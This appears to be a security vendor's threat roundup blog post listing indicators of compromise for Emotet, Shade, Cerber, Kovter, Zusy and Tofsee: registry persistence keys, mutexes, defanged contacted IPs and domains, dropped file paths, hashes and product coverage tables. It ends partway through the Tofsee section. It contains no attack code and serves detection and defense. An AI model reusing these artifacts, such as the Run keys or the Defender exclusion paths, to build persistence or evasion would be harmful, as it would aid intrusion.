For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found herethat includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness.
The most prevalent threats highlighted in this roundup are:
Threat NameTypeDescription
Doc.Downloader.Emotet-7181535-0 Downloader Emotet is a banking trojan that has remained relevant due to its continual evolution to better avoid detection. It is commonly spread via malicious emails. It recently resurfaced after going quiet over the summer of 2019.
Win.Ransomware.Shade-7178907-1 Ransomware Shade, also known as Troldesh, is a ransomware family typically spread via malicious email attachments.
Win.Dropper.Cerber-7174760-0 Dropper Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension ".cerber," although in more recent campaigns, this is no longer the case.
Win.Dropper.Kovter-7173679-0 Dropper Kovter is known for it's fileless persistence mechanism. This family of malware creates several malicious registry entries which store its malicious code. Kovter is capable of reinfecting a system even if the file system has been cleaned of the infection. Kovter has been used in the past to spread ransomware and click-fraud malware.
Win.Malware.Zusy-7173469-1 Malware Zusy, also known as TinyBanker or Tinba, is a trojan that uses man-in-the-middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as "explorer.exe" and "winver.exe." When the user accesses a banking website, it displays a form to trick the user into submitting personal information.
Win.Packed.Tofsee-7171939-0 Packed Tofsee is multi-purpose malware that features a number of modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator’s control.

Threat Breakdown

Doc.Downloader.Emotet-7181535-0

Indicators of Compromise

Registry KeysOccurrences
<HKCR>\INTERFACE\{8BD21D12-EC42-11CE-9E0D-00AA006002F3} 31
<HKCR>\WOW6432NODE\INTERFACE\{8BD21D22-EC42-11CE-9E0D-00AA006002F3} 31
<HKCR>\INTERFACE\{8BD21D22-EC42-11CE-9E0D-00AA006002F3} 31
<HKCR>\WOW6432NODE\INTERFACE\{8BD21D32-EC42-11CE-9E0D-00AA006002F3} 31
<HKCR>\INTERFACE\{8BD21D32-EC42-11CE-9E0D-00AA006002F3} 31
<HKCR>\WOW6432NODE\INTERFACE\{8BD21D42-EC42-11CE-9E0D-00AA006002F3} 31
<HKCR>\INTERFACE\{8BD21D42-EC42-11CE-9E0D-00AA006002F3} 31
<HKCR>\WOW6432NODE\INTERFACE\{8BD21D52-EC42-11CE-9E0D-00AA006002F3} 31
<HKCR>\INTERFACE\{8BD21D52-EC42-11CE-9E0D-00AA006002F3} 31
<HKCR>\WOW6432NODE\INTERFACE\{8BD21D62-EC42-11CE-9E0D-00AA006002F3} 31
<HKCR>\INTERFACE\{8BD21D62-EC42-11CE-9E0D-00AA006002F3} 31
<HKCR>\WOW6432NODE\INTERFACE\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F} 31
<HKCR>\INTERFACE\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F} 31
<HKCR>\WOW6432NODE\INTERFACE\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F} 31
<HKCR>\INTERFACE\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F} 31
<HKCR>\WOW6432NODE\INTERFACE\{4C5992A5-6926-101B-9992-00000B65C6F9} 31
<HKCR>\INTERFACE\{4C5992A5-6926-101B-9992-00000B65C6F9} 31
<HKCR>\WOW6432NODE\INTERFACE\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D} 31
<HKCR>\INTERFACE\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D} 31
<HKCR>\WOW6432NODE\INTERFACE\{47FF8FE0-6198-11CF-8CE8-00AA006CB389} 31
<HKCR>\INTERFACE\{47FF8FE0-6198-11CF-8CE8-00AA006CB389} 31
<HKCR>\WOW6432NODE\INTERFACE\{47FF8FE2-6198-11CF-8CE8-00AA006CB389} 31
<HKCR>\INTERFACE\{47FF8FE2-6198-11CF-8CE8-00AA006CB389} 31
<HKCR>\WOW6432NODE\INTERFACE\{47FF8FE3-6198-11CF-8CE8-00AA006CB389} 31
<HKCR>\INTERFACE\{47FF8FE3-6198-11CF-8CE8-00AA006CB389} 31
MutexesOccurrences
Global\I98B68E3C31
Global\M98B68E3C31
5CAC3FAB-87F0-4750-984D-D50144543427-VER152
Local\{F99C425F-9135-43ed-BD7D-396DE488DC53}2
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
74[.]208[.]236[.]14531
190[.]158[.]19[.]14127
139[.]5[.]237[.]2727
5[.]45[.]108[.]1468
86[.]109[.]99[.]70/318
17[.]36[.]205[.]747
173[.]194[.]68[.]108/317
195[.]114[.]1[.]1817
82[.]223[.]190[.]138/317
181[.]123[.]0[.]1257
80[.]94[.]2[.]2337
217[.]116[.]0[.]2376
62[.]149[.]157[.]556
195[.]20[.]225[.]1716
173[.]194[.]175[.]108/315
201[.]214[.]74[.]715
212[.]227[.]15[.]1584
182[.]50[.]144[.]844
193[.]70[.]18[.]1444
193[.]17[.]41[.]994
212[.]227[.]15[.]1424
162[.]210[.]102[.]1994
212[.]227[.]15[.]1354
217[.]116[.]0[.]2284
62[.]149[.]128[.]424
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
otc-manila[.]com31
smtp[.]mail[.]me[.]com7
smtp[.]movistar[.]es7
mail[.]tradeus[.]eu7
mail[.]serviciodecorreo[.]es6
smtp[.]1and1[.]es6
imap[.]1und1[.]de6
smtp[.]serviciodecorreo[.]es6
mail[.]aruba[.]it6
mail[.]ionos[.]es6
mail[.]gwiazdeczka[.]pl6
smtp[.]outlook[.]com5
pop-mail[.]outlook[.]com5
smtpout[.]secureserver[.]net5
smtp[.]1und1[.]de5
imap[.]serviciodecorreo[.]es5
mail[.]zenithexperience[.]es5
mail[.]comcast[.]net4
mail[.]1und1[.]de4
pop[.]asia[.]secureserver[.]net4
smtp[.]orange[.]fr4
ssl0[.]ovh[.]net4
poczta[.]o2[.]pl4
smtp[.]aruba[.]it4
mbox[.]freehostia[.]com4
*See JSON for more IOCs
Files and or directories createdOccurrences
%HOMEPATH%\657.exe31
\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{8BD21D10-EC42-11CE-9E0D-00AA006002F3}1
%SystemRoot%\SysWOW64\gcycF3Sb1.exe1
%SystemRoot%\SysWOW64\qoOwTVXh.exe1
%SystemRoot%\SysWOW64\gMVKv3.exe1
%TEMP%\CVRF2C.tmp1
%TEMP%\CVRB39.tmp1
%TEMP%\CVRDF3.tmp1

File Hashes

075a45f9c68a9f5af201e7863394c91cf5a1f939d2a6b21fbd9c749c0a10696f 291a9820bceb930a4106c341c6bb37f2242b5ca0c653923db92dcac50d9c953f 2926d350ee2037949c36a19aca959b8404626f09d32bf930cf9b218424f7cf27 2991af9ecbba0ae304f43ab19ba172ef2ff18345b5fd8f7abc4bc4e2b0a775b3 2a078275cdeb69e448bd7cea359ce34c05ab028713357df0b70448dcdb9f8f0c 3e390763b85cd1322e1fe528ab15923df480ce1f2dabff373bfc67ed8d0d5aa7 5855ccd73204841b2e32d2cd93598ef8b5e0698abc5a8cea26b7e14b279a7448 5a8c51d22698e05215e2f3fdc50a14342fb3108acf6bde761c87d9ae2106d5d1 5c221d09b195901d9435a897f131cb06b9c88bc24d34f7effe2168a66bf935cc 6a8beeef74251f9d91d1965649cabfd7f9840e4ba63259c91c8ecd9020cdda45 6bf59378b0897e410d4d9faa0a23d22e6e96ebedbe3d543338d1f9f3d9c3f21a 742719dfdde109a1cff437941a1f14d8eb3a844a22da6c010d09b835366bb2dd 777d585b5e7e30bce1d8e8e343a007e9d0b6e4f45afa9f415b3fb8b3296a50f0 77d0c4316554e2f7c78b7554f0d067c210c242cb0150a8a1aa3ab4b0d6ccc9df 7a375d0966ac0053e566827ddd3a6c9d2f8251f2a754f0502a61a89f98a94ea9 83f74cedc1e06f0b2377df8d41e67ed0273948888705fbe391e1d82849c54330 8ce63dc6baa9a80c3913d462bdb19fc1bc1ba635bde1d5a6c26fc5f7cf325ea4 a44828c3d4266e7b6518fb6be06907d6d9de2c48546d7ea2c73c2fed3f3fa75c a88780c026c4094e0580a2ab21118b96dab08e00d1935bd6fae2946fd81bdb03 b1d366a828f6eb91a08dd023aa98f2b8b9737497eff937e2d169e5a6b6377d25 b637cedefc7244a8a84bede6eb7733803744f4ac140ed368da9a64c06e98dc28 ba3f8c880453fc3cd667709325895c93cfe6a1e371456c58336e6bb7455668dc c19c5960f37853a5f2db86cc749593dd98b124ddd21d39b8ca53c921389a0bd6 c4c30e304d232b9b5cf276d9534675dff3a541ee41b271fed54a37b3f1fd9aef cbb3ac37b40296794f6f30dd6efc2a9cb3cc35f2438b8ba89f14b58971e14d26
*See JSON for more IOCs

Coverage

ProductProtection
AmpThis has coverage
Cloudlock N/A
CwsThis has coverage
Email SecurityThis has coverage
Network SecurityThis has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
UmbrellaThis has coverage
WsaThis has coverage

Screenshots of Detection

AMP


ThreatGrid


Umbrella


Malware




Win.Ransomware.Shade-7178907-1

Indicators of Compromise

Registry KeysOccurrences
<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION
Value Name: xi
155
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Client Server Runtime Subsystem
155
<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION
Value Name: xVersion
155
<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32 154
<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION 154
<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION
Value Name: xmode
76
<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION
Value Name: xpk
76
<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION
Value Name: xstate
76
<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION
Value Name: shst
75
<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION
Value Name: sh1
75
<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION
Value Name: shsnt
73
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER
Value Name: CleanShutdown
36
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APPLETS\SYSTRAY
Value Name: Services
26
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\TELEPHONY
Value Name: DomainName
13
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\TELEPHONY
Value Name: TAPISRVSCPGUID
13
<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION
Value Name: xmail
9
MutexesOccurrences
GeneratingSchemaGlobalMapping64
cversions.2.m35
Global\47348ae1-defe-11e9-a007-00501e3ae7b51
Global\f1f16ad1-df02-11e9-a007-00501e3ae7b51
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
66[.]171[.]248[.]17875
128[.]31[.]0[.]3957
208[.]83[.]223[.]3456
194[.]109[.]206[.]21253
154[.]35[.]32[.]552
76[.]73[.]17[.]19451
171[.]25[.]193[.]950
193[.]23[.]244[.]24446
86[.]59[.]21[.]3846
131[.]188[.]40[.]188/3146
132[.]148[.]98[.]11619
79[.]98[.]28[.]2813
198[.]187[.]29[.]3511
173[.]236[.]177[.]1008
162[.]216[.]45[.]56
46[.]105[.]57[.]1695
198[.]54[.]120[.]2315
94[.]23[.]64[.]35
13[.]107[.]21[.]2004
204[.]79[.]197[.]2004
5[.]9[.]158[.]754
23[.]6[.]22[.]1894
145[.]239[.]6[.]188/314
47[.]101[.]49[.]134
66[.]33[.]211[.]134
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
ipv4bot[.]whatismyipaddress[.]com75
api[.]w[.]org12
gmpg[.]org7
www[.]breilginestet[.]fr5
getjobportal[.]com5
saschoolsphotography[.]co[.]za5
www[.]loudgraphicsonline[.]com5
login[.]microsoftonline[.]com4
filesextension[.]com4
www[.]solvusoft[.]com4
shell[.]windows[.]com4
fileinfo[.]com4
openfile[.]club4
file[.]org4
www[.]techwalla[.]com4
opentmpfile[.]com4
freeformmanagementco[.]com4
manosapnas[.]lt4
www[.]wuyufeng[.]cn4
jdcontractingomaha[.]com4
www[.]lalogarcia[.]es4
www[.]mobiadnews[.]com4
paulbacinodentistry[.]com4
levente[.]biz[.]pk4
www[.]anniechase[.]com4
*See JSON for more IOCs
Files and or directories createdOccurrences
%ProgramData%\Windows\csrss.exe155
%ProgramData%\Windows154
%TEMP%\6893A5D897154
\README1.txt76
\README10.txt76
\README2.txt76
\README3.txt76
\README4.txt76
\README5.txt76
\README6.txt76
\README7.txt76
\README8.txt76
\README9.txt76
%APPDATA%\Mozilla\Firefox\profiles.ini71

File Hashes

01a47aefed5ad89958df66ceaaece3eb1028f5eb339b5fc405c365bf016652ae 0450d2d5b575c24bf8fc23859a53432ba1ea2bcb44bf9e143e1740c2643074f1 04d08fed39c68ff27751497d6cb543d8a7d082cd2efdda0515853a9fa0f8d70c 053eb4558f17ff9d2e8af9fc171f279b1a43be35a309ca1298f581eb332a8790 07e7472cce0ba35d0f9548372f2b93d56e5fe7597a8de0de337c3a2d96f2c69c 093b4505194249591522a9bed6abfc24d9911d4a64c89a51a46ac75d41a0f3a4 0bdf07fea4e8ae1e9d2e0bb4404770dd32eca713a3d6e1aeac9e61fe99925e46 0cf81c6a0a6181bbce5722c133852889b4dc09752453df36298179ef4d944deb 0ff03d25c9b864f54528b717a00fe970de388859ee81927a396621cf8dbf863b 1130c8c8e7efb0f284f7d6b8b1089668209ff18dba350d3e92fd79ad926043e7 1182d3ff1023ae91fb020eae5e94d8cbba61830118e0056fa3258a4e12759582 12df326da78cbb6da153914c68589ead268cace00a86085ea499c6f7f1562586 146c7a3b418c9b3525b2f5e87be07d252c25be2443600d3f72cddb45b8d3090c 149fa66f4458bb3300e1ff199d2f7f49922dce62980355b011625ed420215687 154c8df75639241776394de1d5c049f7851f0aef4471d4bf52d570707d0f768e 15e2104c27574da42e078a601acf2eb4c0bf70dabfaa9613b490fcb9b44a244f 17c184a6bb5976dcdc89a192409c80e9b4034334baf31017cff23fb2236316ca 180018cdf5693f805c584fa96443960fa18d94f98e17c8d9ebee15e33439a717 19eebbaaebcc15648f5a7c54b4090587cb63ff5ca61a18ea5261a9d5c4e20913 1ab04b2a9761d339b42f963aa0329e53e388b3c685ebb388cb7165cbd0eb7ee4 1b3b09c6ff6a035dba76d90f401127e58cc897895c077a9c5842b7d1890720f8 1d5d51d82b63ac0ad56d91b39f7b4d271a2e4413e90d36fcf38804dddd321018 209d05880be9d0626504cc03ad8c05b5f967186dfbbd6f7f020b377dd692fbed 20d5c1348fcefe4920bb03dd859a1967116a7f09f21fa30ba46c47b94d0bc259 20ec024bae45dadd7f89e4c2ac2d883135593e0d9de294c7d2d0daaaf7c024e9
*See JSON for more IOCs

Coverage

ProductProtection
AmpThis has coverage
Cloudlock N/A
CwsThis has coverage
Email SecurityThis has coverage
Network SecurityThis has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
UmbrellaThis has coverage
WsaThis has coverage

Screenshots of Detection

AMP


ThreatGrid


Umbrella




Win.Dropper.Cerber-7174760-0

Indicators of Compromise

Registry KeysOccurrences
<HKLM>\SYSTEM\CONTROLSET001\CONTROL\SESSION MANAGER 37
<HKLM>\SYSTEM\CONTROLSET001\CONTROL\SESSION MANAGER
Value Name: PendingFileRenameOperations
37
MutexesOccurrences
shell.{381828AA-8B28-3374-1B67-35680555C5EF}37
shell.{<random GUID>}22
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
94[.]22[.]172[.]0/2737
94[.]21[.]172[.]0/2737
94[.]23[.]172[.]0/2537
150[.]109[.]231[.]11628
3[.]225[.]205[.]11219
52[.]86[.]198[.]6318
178[.]128[.]255[.]1799
104[.]24[.]110[.]1359
104[.]24[.]111[.]1358
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
api[.]blockcypher[.]com37
hjhqmbxyinislkkt[.]1j9r76[.]top28
bc-prod-web-lb-430045627[.]us-east-1[.]elb[.]amazonaws[.]com22
chain[.]so9
bitaps[.]com9
btc[.]blockr[.]io9
Files and or directories createdOccurrences
<dir>\_READ_THI$_FILE_<random, matching [A-F0-9]{4,8}>_.hta37
<dir>\_READ_THI$_FILE_<random, matching [A-F0-9]{4,8}>_.txt37
<dir>\<random, matching [A-Z0-9\-]{10}.[A-F0-9]{4}> (copy)22

File Hashes

0290d4b80c48806f165fc69f0ad6f61ae4279a3c4aa85f24a23f6166e2056880 0675dd9ca7d0258f82f849b923c9f73574f7dc18660243964af3ca5ff5f83263 09558b11776fef2c9fe97ce334bcde4ab8bda7e6befc0becf0e06899742a102e 0e64387a13170fd75c61600e8420aaa93249265813cda9555c47b1d09c1f5cb9 115efdb3253671c21f525ef951c3427c210b0d762e81230e1071927a9081aa69 17fba2ecea6df6d1097de2bdedfce13dfc93884cf0725cdc0144bd61c9b3c49b 1e1a3c08ab28baa17331e96a2741f193120d81be3728975a8617322ab59cacea 21261d7e4e8df88ed2b02b84d6089cb5a3967b4d720ae1316f587fdfb0502754 2eb147f2c94c81e3e031a7aaa8f5f46e94d30a27f957b694bb43d9c7700a9a2c 2f94adf1f16c33bc8fd151ff86278a076bc9a817410ba8c4fe70e3a47594f934 398e36ca258b2004f6532081a5f4f7b8487af2f2fc47999469db795186fbfaaf 3c61509268caa1ddfc237409e46456ae862d1b8f058c178073139013ebff5cba 4148780b48335a6080b75d9d881f2c8c4e876ff2d5a0e8787c6fb7fbb5880114 42d25d3a5e18cdd4293b7cc17d3037695a47104ed6f874411fdf1be067e849a0 4580ecc3393d75b0ce69a8458afe9d19f460d2a618d2607e7a04e4bcc0810ad4 4623e856d3a24d187a33c89ca3f4d9a0333cbde4e051fc7c5d612cf01231ec05 52d7d75140381ab82780710ccb60fbde8251b7f31b85e533ecaff7dbec9b4ca8 592c9b4c77c295aa32bb9774b3b968f9dc9d55c17faaadd92b4629d6def1ad61 60c82c336eb368cc3a24c141513b4cf3789a7db7133967adb57ef81287305b3b 63ae7ce0bc9774b278fd6c349aea2af5b83e5779691fed96074b98ec44f059b7 6ee82f9a8090b3a074b19472f4ba79fff42495c261814e85db46582a3824f595 7e727b8dccd44f0cfc6b3771806243ae8d68a643dbdb4bdc9c2b54bccee7284d 8ed9c0eb8ab59f127ddfb578d2ff65030eb22fcf11f129f7ad0e2b551245d79a 99f5973656d5950ded3d862340ff5f25770c82a4b93827075b8d11b76f7aeb4c a32ea31bc647853875b02c2ead84c6ad872ddc100185308d4978db841bd72f21
*See JSON for more IOCs

Coverage

ProductProtection
AmpThis has coverage
Cloudlock N/A
CwsThis has coverage
Email SecurityThis has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
Umbrella N/A
Wsa N/A

Screenshots of Detection

AMP


Malware




Win.Dropper.Kovter-7173679-0

Indicators of Compromise

Registry KeysOccurrences
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE
Value Name: DisableOSUpgrade
22
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\OSUPGRADE
Value Name: ReservationsAllowed
22
<HKLM>\SOFTWARE\WOW6432NODE\FC6A75BE78
Value Name: 0521341d
22
<HKCU>\SOFTWARE\FC6A75BE78
Value Name: 0521341d
22
<HKLM>\SOFTWARE\WOW6432NODE\FC6A75BE78
Value Name: b5e001e3
22
<HKCU>\SOFTWARE\FC6A75BE78
Value Name: b5e001e3
22
<HKLM>\SOFTWARE\WOW6432NODE\FC6A75BE78
Value Name: 0905afc0
20
<HKCU>\SOFTWARE\FC6A75BE78
Value Name: 0905afc0
20
<HKLM>\SOFTWARE\WOW6432NODE\QYFTG2
Value Name: 3X3ii1
1
<HKLM>\SOFTWARE\WOW6432NODE\QYFTG2
Value Name: bDH1PvniwF
1
<HKLM>\SOFTWARE\WOW6432NODE\721AB795C7C67F3DC 1
<HKLM>\SOFTWARE\WOW6432NODE\0MI0EBD 1
<HKLM>\SOFTWARE\WOW6432NODE\18F3F1A771B2D052 1
<HKLM>\SOFTWARE\WOW6432NODE\EGDJPDTYRP 1
<HKLM>\SOFTWARE\WOW6432NODE\721AB795C7C67F3DC
Value Name: 95635A6FA6E8366D
1
<HKLM>\SOFTWARE\WOW6432NODE\18F3F1A771B2D052
Value Name: CF87DF8672E1A15F
1
<HKLM>\SOFTWARE\WOW6432NODE\0MI0EBD
Value Name: u0Lsan
1
<HKLM>\SOFTWARE\WOW6432NODE\0MI0EBD
Value Name: DS2VgqHGE
1
<HKLM>\SOFTWARE\WOW6432NODE\EGDJPDTYRP
Value Name: jPILeBsM9v
1
<HKLM>\SOFTWARE\WOW6432NODE\EGDJPDTYRP
Value Name: kGvXXUg
1
<HKLM>\SOFTWARE\WOW6432NODE\EA246A9E9F458BD5954 1
<HKLM>\SOFTWARE\WOW6432NODE\SVN2OQM 1
<HKLM>\SOFTWARE\WOW6432NODE\EA246A9E9F458BD5954
Value Name: 2CA8F0C3E2A3881649D
1
<HKLM>\SOFTWARE\WOW6432NODE\SVN2OQM
Value Name: Ck6a8biOX
1
<HKLM>\SOFTWARE\WOW6432NODE\SVN2OQM
Value Name: m7MJLVAz
1
MutexesOccurrences
C59C87A31F74FB5622
Global\42EDC1955FE17AD422
0D0D9BEBF5D08E7A22
1315B41013857E1922
BAD24FA07A7F6DD915
863D9F083B3F4EDA15
Global\EE662FBC96CBCB1A15
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
176[.]111[.]49[.]432
46[.]4[.]52[.]1092
209[.]214[.]91[.]1221
76[.]229[.]109[.]1101
220[.]85[.]229[.]1691
80[.]88[.]109[.]651
59[.]164[.]225[.]691
15[.]155[.]62[.]371
216[.]150[.]65[.]1961
121[.]230[.]123[.]1101
6[.]213[.]48[.]1131
99[.]248[.]253[.]801
77[.]80[.]6[.]371
19[.]43[.]124[.]2131
118[.]121[.]204[.]1091
36[.]244[.]111[.]171
142[.]100[.]180[.]911
15[.]198[.]236[.]2001
209[.]194[.]106[.]1661
153[.]235[.]117[.]2351
110[.]145[.]21[.]951
7[.]83[.]197[.]1631
223[.]108[.]247[.]601
222[.]180[.]100[.]741
72[.]139[.]210[.]781
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
ottensen[.]de1
www[.]tastingtable[.]com1

File Hashes

2c09d76519ef840e68d07428643a76b32cc15672ea227b1a373ac68d25364446 3d98668f8b44ff601400103fa4aabac3b9066892f0d32d6ad680ebfd6e22dc16 49cda94863ca85a318f0990f2d092a05746ef7d961a595ec268f0c9cc45968a2 6eccd1f893534539a478c8ec9e9eba5c57095dc3ebf53c3b0c74c47a6b306b51 71533197271e536d08e551a226133c4e2efb1262521498b5d021c3b7e5458062 734eab522ba7c0c5c3afeb61a6e8cae6c3b4c5375716aa15541e388fe2d03547 949a7cec76633cc63b11f3748d304b88fa89ef679927e2911b46639c91c0f9ce 9856c913730a44ee3d02ef3b36ed9c6da721a5ec55118c367ba69926753e6a42 9e7bc2705e9c9d0173e6fb49bd400dc8ccaca56e51557c31c17c814c8256f3e2 b00b3dd9bef667e32501e21a13a8af398d8d8a9778e95f1df2c21746a08ee102 b36e6ed7ff386b9f4d5e8c0284fe177d08eca668d46e70aa48340b883d696e27 bb3cd50224232eb7809baa208fd5b14f9e9d1aed691c383092f7245c89005241 beeeed6fc246f493b6be8f65c76cd328995147069d5091f4e2d01e927e631fe7 c245b59592220a1b4cd08432e842cc391845b471fc2eeb494aa0cb57453cf6e8 d3bdca637e70ed87cdc31d97c7e46320f20b73ed7c4af1fa25e11e9efab8e9f7 d4413827ff12f897303b585bf28ddf3edd7d836a92847671a178dfc8dc48cb7c d5b5c2669ae45d436595ca86076208154f354de9a03135c23db20703ad034d08 d848892262acf288673c23c37be7f284b8b8747e8a424ed1ab342bfada5ff6b2 e4cd277d934fc543aea55870dd316bdf8b7437907a14332a441d6730ab4212e7 ede4f19e39c2e6c794c3ae97e5ba66b6eba29503ac8d71e9d84a10b697e8e5bb f6d37485e3e3f9412bd6eeb3767a17949cfb87ccfec649f1a4590d8ac189ab50 fe5e1062716fe717363599ee27f85553a1598dd5e7b9b16f83de57e828a04e03

Coverage

ProductProtection
AmpThis has coverage
Cloudlock N/A
CwsThis has coverage
Email SecurityThis has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
Umbrella N/A
Wsa N/A

Screenshots of Detection

AMP


ThreatGrid




Win.Malware.Zusy-7173469-1

Indicators of Compromise

Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: EEFEB657
25
MutexesOccurrences
EEFEB65779
4A60888F13
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
216[.]218[.]185[.]16213
216[.]218[.]206[.]691
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
brureservtestot[.]cc9
Files and or directories createdOccurrences
%HOMEPATH%\AppData\LocalLow\EEFEB65726
%APPDATA%\EEFEB65726
%APPDATA%\EEFEB657\bin.exe25
%APPDATA%\4A60888F\bin.exe13

File Hashes

00afaf857ac8a4185bf3c413a0e4ec739cee9a3add5587042176270e2ba45465 0a97cd074abef0a20d0abacc579a0cb8de4eacda90bff198c69c58635085000d 12688cb61170c54096bce727b51225e5ac0d7614389634dab3ffeb41c207eab9 12c1420737fc88fe942c45cfa08c071d1e71cc085d108a8822566ccb7b832384 13548f2c1a514d85d5b47f719dda62ddf24cb1c71283b048aa8171a218a03b26 17999d48dc7614dc4f5c9fb078575df2396a0ba5e255685185ed5d2e2eaf8c85 1ed34a43106c50971c74b903f431e6564356ca6d67aec1233e83a1294375331c 1eeb3abd65800306e131d3de28807d183b9b430d9383a210b783c17f2048c1ca 203bbe399a62a7c8d30cf540647495d8fa7de90d8cbb0d666a901444942e9d1d 24ec9675730ebbd18fb3ce3f206a9e655bb83cced94e9aa9413944d34d159be3 261eeef081001542bbb3a528323e03a2f451930e304283e12e6668a764a1cac2 275943755b7ac0ce098df1d040396388b28de93bd8afde32f09b70b85800de79 29a4810fe9a54f55f4ece5797c593c474f62abc0a6b5d3dc3b3a0b21199993e8 2f6fff7aedc91ca250f42ee261df91fd5dde94741c54e6bcec4177a83bd665d1 39c130462d81e7488499d5f82adbe21f6a6e4926c52302a3f8d5151712869e54 45c2a30595130a32670a68527863cda01572870ab58c49ea12fc26dfd7e1f835 4979596ca617c43eedb54615f3443252c34a94793c3b94d35c44fed705843626 4aa3743336f0260b0734175365b6d409170009e5c1f223cb18bcc53fd3ad9b46 5153276508219d637a03570d1a228dbb60846849cf5659fc189c4d23a6555aa3 5c2529c1e5e740724ff97ef607c65cd2eaa39a096c52947946815187bf406376 5f35edd69fac10f629c53ee3d067ee0cb811fa3bc089b3f6c3d5ea98240675f7 62a73bcebe68715f7c79346d5d43c1017efb469d906cb62cd95949f4fea00b09 684d0bba591a3d78b3720573fa348ce327ac3d9be0ae3e6c337a77dfb294861e 6a8b78f181b0391908613fc6bb362ef1a3d0500c2ee80204e8a8c9099ec56ab7 6b324fe79b3118bf435ff17c4192e606928deb54613c2601ec0c763955e64a1b
*See JSON for more IOCs

Coverage

ProductProtection
AmpThis has coverage
Cloudlock N/A
CwsThis has coverage
Email SecurityThis has coverage
Network SecurityThis has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
UmbrellaThis has coverage
WsaThis has coverage

Screenshots of Detection

AMP


ThreatGrid


Umbrella




Win.Packed.Tofsee-7171939-0

Indicators of Compromise

Registry KeysOccurrences
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config3
10
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> 10
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Type
10
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Start
10
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ErrorControl
10
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: DisplayName
10
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: WOW64
10
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ObjectName
10
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Description
10
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config0
10
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config1
10
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config2
10
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ImagePath
6
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\nguazhnc
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\tmagfnti
2
